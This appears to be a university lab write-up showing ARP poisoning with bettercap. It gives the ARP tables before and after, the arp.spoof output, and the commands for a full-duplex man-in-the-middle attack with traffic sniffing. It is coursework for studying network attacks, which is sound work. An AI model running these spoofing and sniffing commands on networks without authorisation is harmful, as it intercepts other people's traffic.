---
title: "ASK1"
author: "Irakleios Kopitas"
date: "22 Mar 2022"
geometry: margin=3cm
output: pdf_document
header-includes:
- \setlength{\parindent}{1em}
- \setlength{\parskip}{0em}
---

![Unipi](http://www.unipi.gr/unipi/odigos_spoudon/unipilogo.png)

\pagebreak
# Arp poisoning

## Arp table

I run the `apr -a` command in order to check the `arp` tables.

\begin{center}\rule{4.8in}{0.4pt}\end{center}
```java
? (192.168.2.106) at b8:27:eb:**:**:** [ether] on enp0s25
? (192.168.2.103) at e8:4e:06:**:**:** [ether] on enp0s25
? (192.168.2.10) at 74:d4:35:**:**:** [ether] on enp0s25
_gateway (192.168.2.1) at 14:2e:5e:**:**:** [ether] on enp0s25
```
\begin{center}\rule{4.8in}{0.4pt}\end{center}

We can see the hosts and their ip to mac address translations.

## Bettercap arp.spoof

By running the `bettercap` script and enabling the `arp.spoof` module we can see
the program running and mapping all ip address to our mac address.

```java
192.168.2.0/24 > 192.168.2.109  » arp.spoof on
[20:13:50] arp.spoof enabling forwarding
[20:13:50] arp.spoof starting net.recon as a requirement for arp.spoof
[20:13:50] arp.spoof arp spoofer started, probing 256 targets.
[20:13:50] 192.168.2.10 detected as 74:d4:35:**:**:** (Giga-Byte Technology Co.,Ltd.).
[20:13:50] 192.168.2.107 detected as 40:b0:76:**:**:** (ASUSTek COMPUTER INC.).
[20:13:50] 192.168.2.106 detected as b8:27:eb:**:**:** (Raspberry Pi Foundation).
[20:13:50] 192.168.2.103 detected as e8:4e:06:**:**:** (Edup International (Hk) Co., Ltd).
```

## Arp table after

This is the arp table while the attack is running.
```java
? (192.168.2.106) at b8:27:eb:**:**:** [ether] on enp0s25
? (192.168.2.103) at b8:27:eb:**:**:** [ether] on enp0s25
? (192.168.2.10) at 74:d4:35:**:**:** [ether] on enp0s25
_gateway (192.168.2.1) at b8:27:eb:**:**:** [ether] on enp0s25
```
\pagebreak

# MIM

In order to do a man in the middle attack we need to specify a host as a target
and enable the full duplex mode.
\begin{center}\rule{4.8in}{0.4pt}\end{center}
```java
set arp.spoof.targets 192.168.2.106
set arp.spoof.fullduplex true
```
\begin{center}\rule{4.8in}{0.4pt}\end{center}

## Net sniffing

Now by running the `net.sniff` module we can see the traffic going to the gateway.

![traffic](./scrot.png)
